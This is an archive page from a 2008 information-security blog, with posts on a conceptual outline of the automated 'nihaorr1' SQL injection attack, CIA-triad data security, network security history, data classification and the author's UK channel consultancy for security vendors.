I went and introduced myself to the guys at Secerno again at InfoSec last week, and whilst I have no professional affiliation with them, I'm always interested in exciting technology which does something new. Steve Moyle, CTO, is a friendly guy who oozes enthusiasm, just as Paul Galwas was when I met him last year. I just got a mail from Steve to tell me about a recent attack, and I thought it was so well explained I offered to reproduce it here. Steve agreed, so here goes:
"The nihaorr1 attack trashed web facing databases all over the planet last week. It was based on an automated SQL Injection attack (Secerno stops these). Previous attacks like this were targeted and individual. It was only a matter of time before someone sinister worked out how to automate it. We were working with a victim not long after the outbreak.
In this attack, they were not stealing data. However, for the affected web sites it would be difficult for anyone claiming PCI compliance that they had their data under control. The attack can easily be rewritten to take integer values (e.g. credit card numbers) from one field (say) and copy them to a text field, and then expose them on web pages ...
Basically, the attack worked as follows:
Step 1: potentially vulnerable sites identified automatically (probably by a Google query)
Step 2: SQL Injection part 1. SQL injection at a site to ask the database for every field it has that contains text
Step 3: SQL Injection part 2. Update every text item in the database with the original item plus a link that will download a trojan to the web browser
Now what happens is that when a web site serves up a page, the text it serves up is called up from its database -- but every piece of text now has a malicious link under it. When clicked on, the link serves up a virus that infects the viewer of the web page.
Note that the original victim -- the web site -- has become the attacker. Whilst the new victim is the website visitor who trusts the site.
This attack will be adapted and will cause real chaos."
Thanks Steve for the entertaining story and explanation of how this attack is working. And, as the Romans say, caveat emptor internettus.
Tuesday, 29 April 2008
The road ahead
With user security, CIA (or AAA as it becomes) is fully integrated. This is an area of security which has been around since computers were first invented, to some degree. It is the most mature of the 3 areas I have picked out in my series of posts so far. [Although please note, these are only picked out for sake of ease, in reality there are overlaps.] Network security is less integrated, although in my career I have watched as point solutions in the network have become more fully integrated. Network devices at least all talk the same language to each other now, TCP/IP as a standard form of communication has kind of settled in.
With data we are not quite so fortunate, C, I and A are not integrated, although large storage companies are trying. There are a few of these though, so they all have their own standards.
In my original piece I said that integrity was the future of data security, and indeed, it will be an important part of every piece of storage eventually, when everyone realises its importance - but that's not a great starting position. I don't think it will be a point solution that becomes part of a data security standard. Integrity will always be an option, along with encryption and compression as the whole data centric security space merges and evolves.
This will happen separately from hardware as well as being built in to it. But will the standards emerge from the hardware, or something distinct and separate from the hardware that the information resides on?
Data-centric security has to be able to move with the data. Anything that the large storage companies try to apply directly into hardware will be difficult to use at best, more likely ignored. We've already seen a big pull and push between Sun, IBM, etc. in trying to standardise key management. If they can't even agree on that, where keys are already in reasonably standard formats, what chance do they have on agreeing on compression, encryption and integrity standards? It is more likely they will pick up and use existing popular methods over time as happened in the network.
I don't want this to become too much of an advert, but I spoke recently about PKWare, because I am interested in them, and will be visiting them this week. I'm going to talk with them about their products in more detail, but they sound very close to my heart, and as close to the reality of reaching my data security nirvana that I've actually seen. What's more, it makes sense.
I've heard some very interesting things about them recently, their new SecureZIP line, and PartnerLink are both areas I identified as being massive opportunities for growth whilst at my previous job. I actually asked our engineers about designing a product almost identical to PartnerLink, but it was too much for our small team. We didn't have the resources to develop the ideas, but now I find those ideas already exist.
Ask anyone (as I did at InfoSec) whether they've heard of PKWare and they will often look blank, until you say "have you ever used PKZIP?", which of course everyone has at some point, if they've used a computer for anything other than emails. I'll be asking some more searching questions this week and reporting back in due course.
With data we are not quite so fortunate, C, I and A are not integrated, although large storage companies are trying. There are a few of these though, so they all have their own standards.
In my original piece I said that integrity was the future of data security, and indeed, it will be an important part of every piece of storage eventually, when everyone realises its importance - but that's not a great starting position. I don't think it will be a point solution that becomes part of a data security standard. Integrity will always be an option, along with encryption and compression as the whole data centric security space merges and evolves.
This will happen separately from hardware as well as being built in to it. But will the standards emerge from the hardware, or something distinct and separate from the hardware that the information resides on?
Data-centric security has to be able to move with the data. Anything that the large storage companies try to apply directly into hardware will be difficult to use at best, more likely ignored. We've already seen a big pull and push between Sun, IBM, etc. in trying to standardise key management. If they can't even agree on that, where keys are already in reasonably standard formats, what chance do they have on agreeing on compression, encryption and integrity standards? It is more likely they will pick up and use existing popular methods over time as happened in the network.
I don't want this to become too much of an advert, but I spoke recently about PKWare, because I am interested in them, and will be visiting them this week. I'm going to talk with them about their products in more detail, but they sound very close to my heart, and as close to the reality of reaching my data security nirvana that I've actually seen. What's more, it makes sense.
I've heard some very interesting things about them recently, their new SecureZIP line, and PartnerLink are both areas I identified as being massive opportunities for growth whilst at my previous job. I actually asked our engineers about designing a product almost identical to PartnerLink, but it was too much for our small team. We didn't have the resources to develop the ideas, but now I find those ideas already exist.
Ask anyone (as I did at InfoSec) whether they've heard of PKWare and they will often look blank, until you say "have you ever used PKZIP?", which of course everyone has at some point, if they've used a computer for anything other than emails. I'll be asking some more searching questions this week and reporting back in due course.
Monday, 28 April 2008
Nearly there...
I've just finished writing my final post in the series of 'data nirvana' posts - you can read it here tomorrow - and taken a quick look back through the other blogs I enjoy to find Rich talking about data classification being dead. I have to agree. I started writing about this last year and even ranted at someone else about not understanding it properly (which I won't dig up again).
Data classification is the real data nirvana of course, but it really can't be achieved satisfactorily. To echo Mr. Mogull for a moment, a network is a dynamic thing, it's constantly being updated with information, which can change its status from Top Secret to Private, or Public to Classified in a stroke. Tags just don't cut it. A company I spoke to at length last year propose a data classification solution. They haven't pushed it as such yet because the market isn't there. A few tyre kickers have had a go, not because they want to classify their data, but because they want to find it. That's a totally different matter. De-duplication is a very good idea, and simple, and sellable. Data classification is a great idea, but complex and completely un-sellable to anyone except me and Rich. [If you manage to invent it, please drop us a line.]
The only way you could manage to classify a system is to close it: make it read-only, or take it off-line as Rich also talks about. That kind of makes technology about as useful as your local library, though, and sends us crashing back into the 20th century just as everyone is getting used to the 21st. Something I find much more interesting is the idea of controlling information from a central hub, with policies in place around it - information sharing. It's more of a 'real world' example of how people are likely to use data security.
It reduces the need for classification as you only have to choose policies around the data you are making available outside your network. I also talked about this last year, as Microsoft released their SISA idea with about 10 other companies involved. This is clearly a good idea, but with so many technologies involved, bound for disaster. I don't know if anyone got anywhere close to deploying this, but I rather think not.
So Information Sharing is my new proxy-nirvana, or pseudo-nirvana, that is, the thing that will sell and be used, and is actually practical and possible. And guess what, I just happen to have written something about it in my post tomorrow... read on.
Data classification is the real data nirvana of course, but it really can't be achieved satisfactorily. To echo Mr. Mogull for a moment, a network is a dynamic thing, it's constantly being updated with information, which can change its status from Top Secret to Private, or Public to Classified in a stroke. Tags just don't cut it. A company I spoke to at length last year propose a data classification solution. They haven't pushed it as such yet because the market isn't there. A few tyre kickers have had a go, not because they want to classify their data, but because they want to find it. That's a totally different matter. De-duplication is a very good idea, and simple, and sellable. Data classification is a great idea, but complex and completely un-sellable to anyone except me and Rich. [If you manage to invent it, please drop us a line.]
The only way you could manage to classify a system is to close it: make it read-only, or take it off-line as Rich also talks about. That kind of makes technology about as useful as your local library, though, and sends us crashing back into the 20th century just as everyone is getting used to the 21st. Something I find much more interesting is the idea of controlling information from a central hub, with policies in place around it - information sharing. It's more of a 'real world' example of how people are likely to use data security.
It reduces the need for classification as you only have to choose policies around the data you are making available outside your network. I also talked about this last year, as Microsoft released their SISA idea with about 10 other companies involved. This is clearly a good idea, but with so many technologies involved, bound for disaster. I don't know if anyone got anywhere close to deploying this, but I rather think not.
So Information Sharing is my new proxy-nirvana, or pseudo-nirvana, that is, the thing that will sell and be used, and is actually practical and possible. And guess what, I just happen to have written something about it in my post tomorrow... read on.
It's not in the network
Everyone's bored of network security aren't they? I certainly haven't thought much about it recently. There are a few reasonable sized companies out there doing very well from network devices, by which I mean devices which control the network traffic in some way, not just sit on the network, analysing this or that, controlling something or providing a secure store for something else.
Back in the year dot of the internet, Cisco made it big from connecting everyone together. At the same time Microsoft made it easy to use a computer, and the internet boom started to have some knock on effects. Suddenly hundreds, thousands and eventually millions of people were connected to each other with little more than an open pipe to each other which could be stopped, stolen or even hijacked.
Corporations understood the need for computer communication between them, it's almost a given these days that you need a computer in business to survive, but security was nowhere near top of their minds.
So a few scary years later, antivirus and then firewall products started to appear. This gave Mr. Corporation a feeling of safety, the bad guys were outside the network, the network was self-cleaning, and the good guys were inside, just like in a normal, physical-world company. The amount of headline space given to firewalls and AV around the beginning of the 90s is, in my humble opinion, the main reason why security is now so difficult to teach and sell. Up until fairly recently, you mentioned IT security to a CEO and he would answer 'we have a firewall already'.
After firewalls came IDS then IPS/IDP, to stop live nasties getting in, undetected by AV, largely because they weren't viruses, or were zero-day attacks, the AV as yet unaware of their signature. Then came VPNs, proxies, reverse proxies, SSL termination points, load balancers, link controllers, etc. To analyse every product would take another 3 weeks, and would not add to this post.
The market was flooded with all manner of devices in the mid to late 90s, and the messaging was hard to follow. This market evolved relatively slowly (compared to the internet boom) and only in recent times have we been able to pick the parts which make sense to use in the network, drop those that don't and turn them into what we are now calling UTM - Unified Threat Management.
UTM is a much better solution to network security issues, but it doesn't cover everything. You still need to have separate user security for example. User security is also still evolving into identity management and identity based access management. Security will never be perfect, so this process will always continue in ever decreasing forward steps. Certainly for now, I'm done with network security. Data security is much more interesting, and that's where I'll continue tomorrow.
Back in the year dot of the internet, Cisco made it big from connecting everyone together. At the same time Microsoft made it easy to use a computer, and the internet boom started to have some knock on effects. Suddenly hundreds, thousands and eventually millions of people were connected to each other with little more than an open pipe to each other which could be stopped, stolen or even hijacked.
Corporations understood the need for computer communication between them, it's almost a given these days that you need a computer in business to survive, but security was nowhere near top of their minds.
So a few scary years later, antivirus and then firewall products started to appear. This gave Mr. Corporation a feeling of safety, the bad guys were outside the network, the network was self-cleaning, and the good guys were inside, just like in a normal, physical-world company. The amount of headline space given to firewalls and AV around the beginning of the 90s is, in my humble opinion, the main reason why security is now so difficult to teach and sell. Up until fairly recently, you mentioned IT security to a CEO and he would answer 'we have a firewall already'.
After firewalls came IDS then IPS/IDP, to stop live nasties getting in, undetected by AV, largely because they weren't viruses, or were zero-day attacks, the AV as yet unaware of their signature. Then came VPNs, proxies, reverse proxies, SSL termination points, load balancers, link controllers, etc. To analyse every product would take another 3 weeks, and would not add to this post.
The market was flooded with all manner of devices in the mid to late 90s, and the messaging was hard to follow. This market evolved relatively slowly (compared to the internet boom) and only in recent times have we been able to pick the parts which make sense to use in the network, drop those that don't and turn them into what we are now calling UTM - Unified Threat Management.
UTM is a much better solution to network security issues, but it doesn't cover everything. You still need to have separate user security for example. User security is also still evolving into identity management and identity based access management. Security will never be perfect, so this process will always continue in ever decreasing forward steps. Certainly for now, I'm done with network security. Data security is much more interesting, and that's where I'll continue tomorrow.
Sunday, 27 April 2008
Continuing the search for data nirvana
It's a while since I wrote about data integrity (actually, I wrote about it a couple of days ago, but not in detail). I will assume that everyone is familiar with the CIA triad before reading on. [If not, please look it up.]
Last year I wrote a couple of pieces which talked about the security of transactions, addressing the user, the network and the data. It was part of a presentation I used in Barcelona to persuade some VCs to invest in Kinamik, who I was then with. I certainly thought it was along the right lines then, and I still think it's relevant, although I need to update the ideas.
Here's a copy of the table I referred to as my Transaction Security table:
Most people involved in using IT of any kind will be familiar with authentication, entering usernames and passwords. Most of us will do this many times a day in fact. We need to do this, to make sure we are who we say we are, to prove our integrity. We need to be authorised to continue our journey in the network, to allow us into the areas we are permitted to view and use. The confidentiality of the network and data is at stake if authorisation is not in place. The network and data therefore needs to have access controls, to stop unauthorised access, or permit authorised access, this is availability.
I've spent a little time and space explaining this because it's not always obvious. Even if we work in a network environment, we don't often see user security, it is built in to applications, operating systems and devices. It is an integral part of being in the network, just as our identities are an integral part of us. User security needs to be like this, or we wouldn't want to use the technology.
OK, maybe this is too simple. I'll let you look at the network security parts for yourselves for the moment. The network is how we travel to the data, as users, so the concepts of C, I and A here are largely intuitive, much as we picture things on a network diagram. Tomorrow I'm going to continue with the network, then wrap up with the search for data nirvana so temptingly promised by the title.
Last year I wrote a couple of pieces which talked about the security of transactions, addressing the user, the network and the data. It was part of a presentation I used in Barcelona to persuade some VCs to invest in Kinamik, who I was then with. I certainly thought it was along the right lines then, and I still think it's relevant, although I need to update the ideas.
Here's a copy of the table I referred to as my Transaction Security table:
| Transaction | Availability | Confidentiality | Integrity |
|---|---|---|---|
| User | Access Controls | Authorisation | Authentication |
| Network | Wireless, Load balancers | Firewalls, IPS, etc. | Anti-Virus, Change Control Mechanisms, Digital Signatures |
| Data | Access Controls | Encryption | Digital Signatures |
Most people involved in using IT of any kind will be familiar with authentication, entering usernames and passwords. Most of us will do this many times a day in fact. We need to do this, to make sure we are who we say we are, to prove our integrity. We need to be authorised to continue our journey in the network, to allow us into the areas we are permitted to view and use. The confidentiality of the network and data is at stake if authorisation is not in place. The network and data therefore needs to have access controls, to stop unauthorised access, or permit authorised access, this is availability.
I've spent a little time and space explaining this because it's not always obvious. Even if we work in a network environment, we don't often see user security, it is built in to applications, operating systems and devices. It is an integral part of being in the network, just as our identities are an integral part of us. User security needs to be like this, or we wouldn't want to use the technology.
OK, maybe this is too simple. I'll let you look at the network security parts for yourselves for the moment. The network is how we travel to the data, as users, so the concepts of C, I and A here are largely intuitive, much as we picture things on a network diagram. Tomorrow I'm going to continue with the network, then wrap up with the search for data nirvana so temptingly promised by the title.
How do you solve a problem like EMEA?
If you were at InfoSec this week you will have noticed a few of the larger stands. For me, seeing companies like Juniper and F5 filling the show floor is comforting in some ways, but in others it indicates where there is work to be done.
If I was the CEO of a tech company looking at the successes of these guys I might think: "The way to tackle EMEA is to put in an office near London, staff it with sales guys and flood the market." Indeed, that is a tried and tested method, but not very successful. I mention these 2 companies specifically because I was lucky enough to work with them both when working in pre-sales at Equip Technology, their UK distributor a couple of years back.
Juniper of course built their success on their NetScreen firewall, and the reason for that success was its simplicity of administration. It sold in lorry-loads and was easily supported by the channel. I know probably 15-20 engineers who are qualified to support Juniper products, and as the company has grown, so has their product arsenal, their training capabilities, and their worth. I think they have a great model for the channel, which was the result of a lot of hard work, but not inconsiderable luck. They hit the market at the right time, and the product was simple enough to keep going locally.
F5 built their success on the fabulous BigIP and the family of products that can reside on one, the LTM, GTM, ATM, Link Controller and probably loads of others by now. When I left the channel they had just bought 4 new companies to fill their portfolio. I was a big fan, simply because they made the GUIs easy for administrators to understand and explain to others. The boxes usually worked and there were few things not possible with the help of iRules and iControls. Success here was down to the need to monitor and re-use infrastructure internally without messing too much with the front end. A bit more complex than the firewall, but easy to explain and justify the costs, this was a sales success more than a technical success, but sales success forces the technical side to keep up. As can be seen from the Juniper example above, the guys who put the work in are now very valuable engineers.
The sales for these pieces of kit were much fewer than with Juniper, but often much much larger. The last deal I was involved in for F5 kit was quoted at over £350k, for a number of devices. The margin on a deal like that is not inconsiderable, when you weigh up the fact that distributors are typically looking for 40% when they take on a new vendor.
So where does that leave everyone else? What about very technical products, or products where sales cycles are long and boxes aren't just shifted along like these guys have managed to achieve? If you've done the sales job in the US, the market doesn't automatically pick up on it over here. In fact, the whole sales job has to be done again, regardless of early adopters and good press. Relying on the channel is still possible, but without regular sales the salesmen soon get frustrated, and the technical guys forget what they have learned. For very technical products, encryption being my experience, this creates a problem which has to be managed very closely. Sales and technical people representing the vendor have to be available to go onsite on a weekly basis, just to keep the product in the minds of those pushing it out there.
This is hard to achieve from San Francisco, so very often an RSM is hired in the UK, they are of course given targets, usually unrealistic ones. They do not have technical skills, so an SE is hired, of variable quality. These 2 have to sell direct AND sell through the channel, 2 very different jobs which can spread them both too thinly, even if they are in constant communication. It is also very stressful, and involves a huge amount of travel, whether you feel like it or not, and whether it gains you anything or not. Selling direct for these long cycles is nerve racking and a thankless task, especially when it fails. However, if you hire someone to just cover the channel, what are they going to do for the other 3 days a week you are employing them?
At SecurEMEA we are helping technical companies address this gap cheaply and effeciently. Communication is key to our survival and success. Once we have helped develop a successful channel to market for a technology, we then aim to help build that company until it can stand on its own in the region. Maybe then you'll see a few more highly technical vendors on stands at InfoSec in the coming years.
If I was the CEO of a tech company looking at the successes of these guys I might think: "The way to tackle EMEA is to put in an office near London, staff it with sales guys and flood the market." Indeed, that is a tried and tested method, but not very successful. I mention these 2 companies specifically because I was lucky enough to work with them both when working in pre-sales at Equip Technology, their UK distributor a couple of years back.
Juniper of course built their success on their NetScreen firewall, and the reason for that success was its simplicity of administration. It sold in lorry-loads and was easily supported by the channel. I know probably 15-20 engineers who are qualified to support Juniper products, and as the company has grown, so has their product arsenal, their training capabilities, and their worth. I think they have a great model for the channel, which was the result of a lot of hard work, but not inconsiderable luck. They hit the market at the right time, and the product was simple enough to keep going locally.
F5 built their success on the fabulous BigIP and the family of products that can reside on one, the LTM, GTM, ATM, Link Controller and probably loads of others by now. When I left the channel they had just bought 4 new companies to fill their portfolio. I was a big fan, simply because they made the GUIs easy for administrators to understand and explain to others. The boxes usually worked and there were few things not possible with the help of iRules and iControls. Success here was down to the need to monitor and re-use infrastructure internally without messing too much with the front end. A bit more complex than the firewall, but easy to explain and justify the costs, this was a sales success more than a technical success, but sales success forces the technical side to keep up. As can be seen from the Juniper example above, the guys who put the work in are now very valuable engineers.
The sales for these pieces of kit were much fewer than with Juniper, but often much much larger. The last deal I was involved in for F5 kit was quoted at over £350k, for a number of devices. The margin on a deal like that is not inconsiderable, when you weigh up the fact that distributors are typically looking for 40% when they take on a new vendor.
So where does that leave everyone else? What about very technical products, or products where sales cycles are long and boxes aren't just shifted along like these guys have managed to achieve? If you've done the sales job in the US, the market doesn't automatically pick up on it over here. In fact, the whole sales job has to be done again, regardless of early adopters and good press. Relying on the channel is still possible, but without regular sales the salesmen soon get frustrated, and the technical guys forget what they have learned. For very technical products, encryption being my experience, this creates a problem which has to be managed very closely. Sales and technical people representing the vendor have to be available to go onsite on a weekly basis, just to keep the product in the minds of those pushing it out there.
This is hard to achieve from San Francisco, so very often an RSM is hired in the UK, they are of course given targets, usually unrealistic ones. They do not have technical skills, so an SE is hired, of variable quality. These 2 have to sell direct AND sell through the channel, 2 very different jobs which can spread them both too thinly, even if they are in constant communication. It is also very stressful, and involves a huge amount of travel, whether you feel like it or not, and whether it gains you anything or not. Selling direct for these long cycles is nerve racking and a thankless task, especially when it fails. However, if you hire someone to just cover the channel, what are they going to do for the other 3 days a week you are employing them?
At SecurEMEA we are helping technical companies address this gap cheaply and effeciently. Communication is key to our survival and success. Once we have helped develop a successful channel to market for a technology, we then aim to help build that company until it can stand on its own in the region. Maybe then you'll see a few more highly technical vendors on stands at InfoSec in the coming years.
Friday, 25 April 2008
I'm limited, it's official
As of today I am now operational as a Limited Company in the UK. Robert Newby & Associates (RNA) now has a bank account and a registered trading number. So that means you can hire me as a consultant, and my associates of course.
SecurEMEA is still growing, and thanks to Rich Mogull's little podcast with me at RSA, I've been inundated with requests for help. It soon became clear to me talking to people about this that this is not going to be a quick process however, and rightly so. By the very nature of what I am offering to clients in the UK, there is a lot of checking, double checking and hesitation to move forwards.
SecurEMEA is being set up to help bring companies into the UK, to address the channel here, and then growth into the wider European market. I'm going to stick my neck out here and say that the majority of US IT security vendors (successful or otherwise) do not know the UK channel to market very well. There are many who haven't even tried, but there are also a brave few who have. Out of these brave few, there are a smaller percentage still who have succeeded.
One company I heard of recently, and who will always remain nameless in my presence, spent 2 years and $3 million pushing a team of 15 people into the UK, thinking they had a great product, and indeed they did. After 2 years, they realised that sales were flatlining, and had to set about chopping the staff back down. This cost more $$$, and took time they didn't have. Then the process of building the company here had to start again. Owch.
Many companies do it cheaply now. I was fortunate to work for Vormetric over here 4 years ago, there was 1 RSM, and me with my spanners. Later a UK sales guy joined and sales dived, so the UK operation became too expensive to maintain at that time. They are going to have a much better year this year, mark my words. Ingrian did the same, 1 RSM, me with a spanner set, and a UK sales guy. They were luckier, and managed to be acquired, but not for a huge hill of beans, and no-one made much out of it. SafeNet will probably not do much with the technology this year in my opinion.
All of this costs money, and as can be seen, is not guaranteed to be successful. An RSM costs $100-150k a year, an SE $100-150k a year, and extra sales guys, the same again. IF they make a sale, then they pay for themselves, but not the offices, infrastructure, etc. And you can't guarantee you're getting good sales guys. And you can't manage them effectively from 5000 miles away. So, this is still cheap is it?
SecurEMEA is based on the premise that I've done it before, and know what mistakes not to make again. I know what sales guys to work with, and who to avoid like the plague (you know who you are!) I know which distributors work well with tricky technologies, and which resellers are more than box shifters. Initially I am planning to do this fairly intensely with a couple of companies only, but in time I would like this to be THE place that people come to break into the UK market.
So, you can see that the people who will be most aware of the benefit that SecurEMEA can bring will be companies who have already tried and been burnt to some degree. Those who haven't tried might be persuaded that they can do without, and indeed, it is possible, especially with products that have a very long sales cycle.
If you can't afford to wait that long, or spend that much cash however, why not drop me a line?
SecurEMEA is still growing, and thanks to Rich Mogull's little podcast with me at RSA, I've been inundated with requests for help. It soon became clear to me talking to people about this that this is not going to be a quick process however, and rightly so. By the very nature of what I am offering to clients in the UK, there is a lot of checking, double checking and hesitation to move forwards.
SecurEMEA is being set up to help bring companies into the UK, to address the channel here, and then growth into the wider European market. I'm going to stick my neck out here and say that the majority of US IT security vendors (successful or otherwise) do not know the UK channel to market very well. There are many who haven't even tried, but there are also a brave few who have. Out of these brave few, there are a smaller percentage still who have succeeded.
One company I heard of recently, and who will always remain nameless in my presence, spent 2 years and $3 million pushing a team of 15 people into the UK, thinking they had a great product, and indeed they did. After 2 years, they realised that sales were flatlining, and had to set about chopping the staff back down. This cost more $$$, and took time they didn't have. Then the process of building the company here had to start again. Owch.
Many companies do it cheaply now. I was fortunate to work for Vormetric over here 4 years ago, there was 1 RSM, and me with my spanners. Later a UK sales guy joined and sales dived, so the UK operation became too expensive to maintain at that time. They are going to have a much better year this year, mark my words. Ingrian did the same, 1 RSM, me with a spanner set, and a UK sales guy. They were luckier, and managed to be acquired, but not for a huge hill of beans, and no-one made much out of it. SafeNet will probably not do much with the technology this year in my opinion.
All of this costs money, and as can be seen, is not guaranteed to be successful. An RSM costs $100-150k a year, an SE $100-150k a year, and extra sales guys, the same again. IF they make a sale, then they pay for themselves, but not the offices, infrastructure, etc. And you can't guarantee you're getting good sales guys. And you can't manage them effectively from 5000 miles away. So, this is still cheap is it?
SecurEMEA is based on the premise that I've done it before, and know what mistakes not to make again. I know what sales guys to work with, and who to avoid like the plague (you know who you are!) I know which distributors work well with tricky technologies, and which resellers are more than box shifters. Initially I am planning to do this fairly intensely with a couple of companies only, but in time I would like this to be THE place that people come to break into the UK market.
So, you can see that the people who will be most aware of the benefit that SecurEMEA can bring will be companies who have already tried and been burnt to some degree. Those who haven't tried might be persuaded that they can do without, and indeed, it is possible, especially with products that have a very long sales cycle.
If you can't afford to wait that long, or spend that much cash however, why not drop me a line?
Subscribe to:
Comments (Atom)